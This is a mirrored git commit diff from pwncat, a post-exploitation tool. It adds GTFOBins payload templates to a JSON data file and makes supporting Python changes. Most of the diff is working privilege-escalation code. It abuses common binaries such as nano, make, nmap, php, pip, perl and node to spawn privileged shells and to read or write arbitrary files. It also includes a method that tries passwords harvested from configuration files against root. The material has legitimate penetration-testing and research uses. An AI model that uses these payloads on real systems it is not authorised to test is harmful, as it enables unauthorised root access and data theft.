mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-24 01:25:37 +01:00
GTFOBins are... theoretically... done???
This commit is contained in:
parent
725f47f387
commit
81d43896ac
@ -503,8 +503,6 @@
|
|||||||
"payload": "TF=none; {command} -h 2>/dev/null 1>&2; TF=$({mktemp} -d);echo \"import sys; sys.stdout.buffer.write(open('{lfile}', 'rb').read())\" > $TF/setup.py; {command} $TF 2>/dev/null | {tail} -n +4",
|
"payload": "TF=none; {command} -h 2>/dev/null 1>&2; TF=$({mktemp} -d);echo \"import sys; sys.stdout.buffer.write(open('{lfile}', 'rb').read())\" > $TF/setup.py; {command} $TF 2>/dev/null | {tail} -n +4",
|
||||||
"args": []
|
"args": []
|
||||||
},
|
},
|
||||||
// This seems to write small files... but not large (over ~4 KB). So we won't use it... ???
|
|
||||||
// easy_install does not give the process stdin, so we need to swap it into a different file, /tmp/b64.
|
|
||||||
{
|
{
|
||||||
"type": "write",
|
"type": "write",
|
||||||
"stream": "base64",
|
"stream": "base64",
|
||||||
@ -611,7 +609,7 @@
|
|||||||
"args": ["-c", "\"spawn {cat} {lfile}; interact\""]
|
"args": ["-c", "\"spawn {cat} {lfile}; interact\""]
|
||||||
}
|
}
|
||||||
// Theoretically we should be able to get File Write for this.
|
// Theoretically we should be able to get File Write for this.
|
||||||
// Sine it has it own little subprocess, I can't seem to get stdin to funnel in.
|
// Since it has it own little subprocess, I can't seem to get stdin to funnel in.
|
||||||
],
|
],
|
||||||
//-------------------------------------------------------------------
|
//-------------------------------------------------------------------
|
||||||
"facter": [
|
"facter": [
|
||||||
@ -748,7 +746,6 @@
|
|||||||
"args": ["-q", "-nx", "-ex", "'python import sys; open(\"{lfile}\",\"w\").write(sys.stdin.read())'", "-ex", "quit"],
|
"args": ["-q", "-nx", "-ex", "'python import sys; open(\"{lfile}\",\"w\").write(sys.stdin.read())'", "-ex", "quit"],
|
||||||
"exit": "{ctrl_d}{ctrl_d}"
|
"exit": "{ctrl_d}{ctrl_d}"
|
||||||
},
|
},
|
||||||
// We SHOULD be able to write base64 data... but for the life of me, I cannot get the whole file to come through. Leaving this alone.
|
|
||||||
{
|
{
|
||||||
"type": "write",
|
"type": "write",
|
||||||
"stream":"base64",
|
"stream":"base64",
|
||||||
@ -1197,14 +1194,510 @@
|
|||||||
"args": ["file://{lfile}"]
|
"args": ["file://{lfile}"]
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"mail": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["--exec='!{shell}'"]
|
||||||
|
}
|
||||||
|
|
||||||
|
// This secondary method is not really tested....
|
||||||
|
// It may work on a "non-GNU" version?
|
||||||
|
// Not sure if the input is what would activate the shell.
|
||||||
|
// I will leave it disabled for now.
|
||||||
|
// {
|
||||||
|
// "type": "shell",
|
||||||
|
// "payload": "TF=$({mktemp}); echo \"From nobody@localhost Fri 29 May 2020 11:16:00 PM EDT\" > $TF; {command}",
|
||||||
|
// "input": "!{shell}\n",
|
||||||
|
// "args": ["-f", "$TF"],
|
||||||
|
// "exit":"exit\n{ctrl_c}",
|
||||||
|
// }
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"make": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-s", "--eval=$'x:\\n\\t-'\"{shell} -p\""]
|
||||||
|
}
|
||||||
|
|
||||||
|
// This also theoretically has support for file write ---
|
||||||
|
// but GTFObins says "requires a newer GNU make version."
|
||||||
|
// Since it can get a shell just fine, pwncat can unlock
|
||||||
|
// the write capability on
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"man": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["man"],
|
||||||
|
"input": "!{shell}\n",
|
||||||
|
"exit": "exit\nq"
|
||||||
|
}
|
||||||
|
|
||||||
|
// Man can also file read...
|
||||||
|
// but it ruins the width of the file, like /etc/passwd is squished.
|
||||||
|
// We can use MANWIDTH variable but it does not work for syntax like:
|
||||||
|
// MANWIDTH=1000 man /etc/passwd
|
||||||
|
// One method to get proper width is:
|
||||||
|
// man man
|
||||||
|
// :e /etc/passwd
|
||||||
|
// but then I cannot get this to stdout....
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"mawk": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command} // {lfile}"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "raw",
|
||||||
|
"payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"more": [
|
||||||
|
// This may fail with sudo because it may not be able to
|
||||||
|
// maintain the environment.
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "TERM= {command} /etc/passwd",
|
||||||
|
"input": "!{shell}",
|
||||||
|
"exit": "exit\nq"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command} {lfile} | {cat}"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"mtr": [
|
||||||
|
// This will fail in dash/ash because of the line substitution.
|
||||||
|
// It may be best to just remove this...?
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream":"print",
|
||||||
|
"payload": "{command} | | while read line; do echo ${line:28:-27}; done",
|
||||||
|
"args": ["--raw", "-F", "{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"mv": [
|
||||||
|
{
|
||||||
|
"type": "write",
|
||||||
|
"stream":"base64",
|
||||||
|
"payload": "TF=$({mktemp} -u); {base64} -d > $TF; {command}; {rm} -f $TF",
|
||||||
|
"args": ["$TF", "{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"nano": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"input": "{ctrl_r}{ctrl_x}reset; {shell} -p 1>&0 2>&0\n",
|
||||||
|
// Exit the shell, then exit nano
|
||||||
|
"exit": "exit\n{ctrl_x}n"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-s", "'{shell} -p'"],
|
||||||
|
"input": "{shell} -p\n{ctrl_t}",
|
||||||
|
// Exit the shell, then exit nano
|
||||||
|
"exit": "exit\n{ctrl_x}n"
|
||||||
|
},
|
||||||
|
|
||||||
|
// If for some reason the -s technique above fails,
|
||||||
|
// try setting the SPELL environment variable.
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "SPELL='{shell} -p' {command}",
|
||||||
|
"args": [],
|
||||||
|
"input": "{shell} -p\n{ctrl_t}",
|
||||||
|
// Exit the shell, then exit nano
|
||||||
|
"exit": "exit\n{ctrl_x}n"
|
||||||
|
}
|
||||||
|
|
||||||
|
// Nano could potentially file read, but I cannot think of
|
||||||
|
// a good way to get the buffer into standard output.
|
||||||
|
// Nano can DEFINITELY file write...
|
||||||
|
// base64 -d | nano - # with an input to save the file
|
||||||
|
// But since it can get a shell, it can unlock write
|
||||||
|
// capability just after.
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"nawk": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command} // {lfile}"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "raw",
|
||||||
|
"payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"nice": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["{shell} -p"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"nl": [
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command} | while read line; do echo $line; done",
|
||||||
|
"args": ["-bn", "-w1", "-s", "''", "{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"nmap": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "TF=$({mktemp}); echo 'os.execute(\"{shell} -p\")' > $TF; {command}; {rm} -f $TF",
|
||||||
|
"input": "reset\n",
|
||||||
|
"args": ["--script=$TF"]
|
||||||
|
}
|
||||||
|
|
||||||
|
// nmap can do some janky file read and file write with lua.
|
||||||
|
// Since a shell can be obtained, pwncat can unlock these
|
||||||
|
// capabilities.
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"node": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-e", "'require(\"child_process\").spawn(\"{shell}\", [\"-p\"], {{stdio: [0, 1, 2]}});'"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"nohup": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["{shell}", "-p", "-c", "\"{shell} -p <$({tty}) >$({tty}) 2>$({tty})\""]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"nroff": [
|
||||||
|
{
|
||||||
|
// This may not behave with sudo since it needs the environment set
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "TF=$({mktemp} -d); echo '#!{shell} -p' > $TF/groff; echo '{shell} -p' >> $TF/groff; chmod +x $TF/groff; GROFF_BIN_PATH=$TF {command}",
|
||||||
|
"args": []
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"nsenter": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["{shell} -p"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"od": [
|
||||||
|
|
||||||
|
// This uses a ton of other dependencies...
|
||||||
|
// sed, head, tr, echo...
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "echo -e $({command} -An -c -w9999 {lfile} | {sed} \"s/ /\\n/g\" | {tr} -d \"\\n\") | {head} -n -1",
|
||||||
|
"args": [""]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"openssl": [
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "raw",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["enc", "-in", "{lfile}"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "write",
|
||||||
|
"stream": "base64",
|
||||||
|
"payload": "{base64} -d | {command}",
|
||||||
|
"args": ["enc", "-out", "{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"pdb": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "TF=$({mktemp} -u); echo 'import os; os.system(\"{shell} -p\"); exit(0)' > $TF; {command}; {rm} -f $TF",
|
||||||
|
"args": ["$TF"],
|
||||||
|
"input": "cont\n"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"perl": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-e", "'exec \"{shell} -p\"'"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"pg": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command} /etc/profile",
|
||||||
|
"input": "!{shell} -p\n\n",
|
||||||
|
"exit": "exit\nq"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "raw",
|
||||||
|
"payload": "{command} | {cat}",
|
||||||
|
"args": ["{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"pager": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command} /etc/profile",
|
||||||
|
"input": "!{shell} -p\n\n",
|
||||||
|
"exit": "exit\nq"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "raw",
|
||||||
|
"payload": "{command} | {cat}",
|
||||||
|
"args": ["{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"php": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'system(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'passthru(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'shell_exec(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'$h=@popen(\"{shell} -p 1>&0 2>&0\",\"r\"); if($h){{ while(!feof($h)) echo(fread($h,4096)); pclose($h); }}'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream":"raw",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'echo(file_get_contents(\"{lfile}\"));'"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"php5": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'system(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'passthru(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'shell_exec(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'$h=@popen(\"{shell} -p 1>&0 2>&0\",\"r\"); if($h){{ while(!feof($h)) echo(fread($h,4096)); pclose($h); }}'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream":"raw",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'echo(file_get_contents(\"{lfile}\"));'"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"php7": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'system(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'passthru(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'shell_exec(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'$h=@popen(\"{shell} -p 1>&0 2>&0\",\"r\"); if($h){{ while(!feof($h)) echo(fread($h,4096)); pclose($h); }}'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream":"raw",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'echo(file_get_contents(\"{lfile}\"));'"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"php7.0": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'system(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'passthru(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'shell_exec(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'$h=@popen(\"{shell} -p 1>&0 2>&0\",\"r\"); if($h){{ while(!feof($h)) echo(fread($h,4096)); pclose($h); }}'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream":"raw",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'echo(file_get_contents(\"{lfile}\"));'"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"php7.3": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'system(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'passthru(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'shell_exec(\"{shell} -p 1>&0 2>&0\");'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'$h=@popen(\"{shell} -p 1>&0 2>&0\",\"r\"); if($h){{ while(!feof($h)) echo(fread($h,4096)); pclose($h); }}'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream":"raw",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-r", "'echo(file_get_contents(\"{lfile}\"));'"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"pic": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-U"],
|
||||||
|
"input": ".PS\nsh X {shell} X\n",
|
||||||
|
"exit": "exit\n{ctrl_c}"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"pico": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"input": "{ctrl_r}{ctrl_x}reset; {shell} -p 1>&0 2>&0\n",
|
||||||
|
// Exit the shell, then exit nano
|
||||||
|
"exit": "exit\n{ctrl_x}n"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-s", "'{shell} -p'"],
|
||||||
|
"input": "{shell} -p\n{ctrl_t}",
|
||||||
|
// Exit the shell, then exit nano
|
||||||
|
"exit": "exit\n{ctrl_x}n"
|
||||||
|
},
|
||||||
|
|
||||||
|
// If for some reason the -s technique above fails,
|
||||||
|
// try setting the SPELL environment variable.
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "SPELL='{shell} -p' {command}",
|
||||||
|
"args": [],
|
||||||
|
"input": "{shell} -p\n{ctrl_t}",
|
||||||
|
// Exit the shell, then exit nano
|
||||||
|
"exit": "exit\n{ctrl_x}n"
|
||||||
|
}
|
||||||
|
|
||||||
|
// Nano could potentially file read, but I cannot think of
|
||||||
|
// a good way to get the buffer into standard output.
|
||||||
|
// Nano can DEFINITELY file write...
|
||||||
|
// base64 -d | nano - # with an input to save the file
|
||||||
|
// But since it can get a shell, it can unlock write
|
||||||
|
// capability just after.
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"pip": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "TF=$({mktemp} -d); echo \"import os; os.execl('{shell}', '{shell}', '-p', '-c', '{shell} -p <$({tty}) >$({tty}) 2>$({tty})')\" > $TF/setup.py; {command}",
|
||||||
|
"args": ["install", "$TF"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"pip3": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "TF=$({mktemp} -d); echo \"import os; os.execl('{shell}', '{shell}', '-p', '-c', '{shell} -p <$({tty}) >$({tty}) 2>$({tty})')\" > $TF/setup.py; {command}",
|
||||||
|
"args": ["install", "$TF"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
|
||||||
//-------------------------------------------------------------------
|
//-------------------------------------------------------------------
|
||||||
"pry": [
|
"pry": [
|
||||||
@ -1369,9 +1862,18 @@
|
|||||||
}
|
}
|
||||||
],
|
],
|
||||||
//-------------------------------------------------------------------
|
//-------------------------------------------------------------------
|
||||||
|
"redcarpet": [
|
||||||
|
{
|
||||||
// redcarpet could be implemented to read files, but since it is
|
// redcarpet could be implemented to read files, but since it is
|
||||||
// originally used to process Markdown files, it prepends and appends
|
// originally used to process Markdown files, it prepends and appends
|
||||||
// HTML paragraph tags to output. This can be problematic.
|
// HTML paragraph tags to output. This COULD be problematic....
|
||||||
|
// I've stripped them out with `sed` as a dependency
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command} | {sed} 's/^<p>//g' | {sed} 's|</p>$||g'",
|
||||||
|
"args": ["{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
|
||||||
//-------------------------------------------------------------------
|
//-------------------------------------------------------------------
|
||||||
// restic can be implemented, but all it has is file upload.
|
// restic can be implemented, but all it has is file upload.
|
||||||
@ -1671,7 +2173,7 @@
|
|||||||
// LFILE=file_to_write
|
// LFILE=file_to_write
|
||||||
// sqlite3 /dev/null -cmd ".output $LFILE" 'select "DATA";'
|
// sqlite3 /dev/null -cmd ".output $LFILE" 'select "DATA";'
|
||||||
// but getting this as stdin might be difficult. Since it already
|
// but getting this as stdin might be difficult. Since it already
|
||||||
// has shell capabaility, it can write after-the-fact and I won't
|
// has shell capability, it can write after-the-fact and I won't
|
||||||
// try to finagle this.
|
// try to finagle this.
|
||||||
],
|
],
|
||||||
//-------------------------------------------------------------------
|
//-------------------------------------------------------------------
|
||||||
|
@ -11,6 +11,9 @@ import io
|
|||||||
class ControlCodes:
|
class ControlCodes:
|
||||||
CTRL_C = "\x03"
|
CTRL_C = "\x03"
|
||||||
CTRL_X = "\x18"
|
CTRL_X = "\x18"
|
||||||
|
CTRL_R = "\x12"
|
||||||
|
CTRL_O = "\x0F"
|
||||||
|
CTRL_T = "\x14"
|
||||||
CTRL_Z = "\x1a"
|
CTRL_Z = "\x1a"
|
||||||
CTRL_D = "\x04"
|
CTRL_D = "\x04"
|
||||||
ESCAPE = "\x1B"
|
ESCAPE = "\x1B"
|
||||||
@ -161,6 +164,9 @@ class Method:
|
|||||||
ctrl_x=ControlCodes.CTRL_X,
|
ctrl_x=ControlCodes.CTRL_X,
|
||||||
escape=ControlCodes.ESCAPE,
|
escape=ControlCodes.ESCAPE,
|
||||||
ctrl_d=ControlCodes.CTRL_D,
|
ctrl_d=ControlCodes.CTRL_D,
|
||||||
|
ctrl_r=ControlCodes.CTRL_R,
|
||||||
|
ctrl_o=ControlCodes.CTRL_O,
|
||||||
|
ctrl_t=ControlCodes.CTRL_T,
|
||||||
**kwargs,
|
**kwargs,
|
||||||
)
|
)
|
||||||
command = f"sudo -u {user} " + command + " " + args
|
command = f"sudo -u {user} " + command + " " + args
|
||||||
@ -179,6 +185,9 @@ class Method:
|
|||||||
ctrl_x=ControlCodes.CTRL_X,
|
ctrl_x=ControlCodes.CTRL_X,
|
||||||
escape=ControlCodes.ESCAPE,
|
escape=ControlCodes.ESCAPE,
|
||||||
ctrl_d=ControlCodes.CTRL_D,
|
ctrl_d=ControlCodes.CTRL_D,
|
||||||
|
ctrl_r=ControlCodes.CTRL_R,
|
||||||
|
ctrl_o=ControlCodes.CTRL_O,
|
||||||
|
ctrl_t=ControlCodes.CTRL_T,
|
||||||
**kwargs,
|
**kwargs,
|
||||||
)
|
)
|
||||||
|
|
||||||
@ -190,6 +199,9 @@ class Method:
|
|||||||
ctrl_z=ControlCodes.CTRL_Z,
|
ctrl_z=ControlCodes.CTRL_Z,
|
||||||
escape=ControlCodes.ESCAPE,
|
escape=ControlCodes.ESCAPE,
|
||||||
ctrl_d=ControlCodes.CTRL_D,
|
ctrl_d=ControlCodes.CTRL_D,
|
||||||
|
ctrl_r=ControlCodes.CTRL_R,
|
||||||
|
ctrl_o=ControlCodes.CTRL_O,
|
||||||
|
ctrl_t=ControlCodes.CTRL_T,
|
||||||
**kwargs,
|
**kwargs,
|
||||||
)
|
)
|
||||||
|
|
||||||
@ -271,6 +283,9 @@ class MethodWrapper:
|
|||||||
ctrl_x=ControlCodes.CTRL_X,
|
ctrl_x=ControlCodes.CTRL_X,
|
||||||
escape=ControlCodes.ESCAPE,
|
escape=ControlCodes.ESCAPE,
|
||||||
ctrl_d=ControlCodes.CTRL_D,
|
ctrl_d=ControlCodes.CTRL_D,
|
||||||
|
ctrl_r=ControlCodes.CTRL_R,
|
||||||
|
ctrl_o=ControlCodes.CTRL_O,
|
||||||
|
ctrl_t=ControlCodes.CTRL_T,
|
||||||
**kwargs,
|
**kwargs,
|
||||||
)
|
)
|
||||||
|
|
||||||
@ -287,6 +302,9 @@ class MethodWrapper:
|
|||||||
ctrl_x=ControlCodes.CTRL_X,
|
ctrl_x=ControlCodes.CTRL_X,
|
||||||
escape=ControlCodes.ESCAPE,
|
escape=ControlCodes.ESCAPE,
|
||||||
ctrl_d=ControlCodes.CTRL_D,
|
ctrl_d=ControlCodes.CTRL_D,
|
||||||
|
ctrl_r=ControlCodes.CTRL_R,
|
||||||
|
ctrl_o=ControlCodes.CTRL_O,
|
||||||
|
ctrl_t=ControlCodes.CTRL_T,
|
||||||
**kwargs,
|
**kwargs,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
@ -11,6 +11,7 @@ import pwncat
|
|||||||
|
|
||||||
|
|
||||||
class Method(BaseMethod):
|
class Method(BaseMethod):
|
||||||
|
# class Nerfed(BaseMethod):
|
||||||
"""
|
"""
|
||||||
Enumerate passwords in configuration files and attempt them on standard
|
Enumerate passwords in configuration files and attempt them on standard
|
||||||
users (UID >= 1000) and root.
|
users (UID >= 1000) and root.
|
||||||
|
@ -134,6 +134,8 @@ class Method(BaseMethod):
|
|||||||
file_owner = pwncat.victim.run(f"stat -c%u {rootshell}").strip()
|
file_owner = pwncat.victim.run(f"stat -c%u {rootshell}").strip()
|
||||||
if file_owner != b"0":
|
if file_owner != b"0":
|
||||||
|
|
||||||
|
# Hop back to the original directory
|
||||||
|
pwncat.victim.run("popd")
|
||||||
raise PrivescError("failed to create root shell")
|
raise PrivescError("failed to create root shell")
|
||||||
|
|
||||||
# Hop back to the original directory
|
# Hop back to the original directory
|
||||||
|
@ -107,7 +107,7 @@ def local_which(path: str, quote: bool = True):
|
|||||||
return result
|
return result
|
||||||
|
|
||||||
|
|
||||||
gtfo = GTFOBins("../data/gtfobins.json", local_which)
|
gtfo = GTFOBins("../pwncat/data/gtfobins.json", local_which)
|
||||||
|
|
||||||
if args.find:
|
if args.find:
|
||||||
if not args.spec:
|
if not args.spec:
|
||||||
|
Loading…
Reference in New Issue
Block a user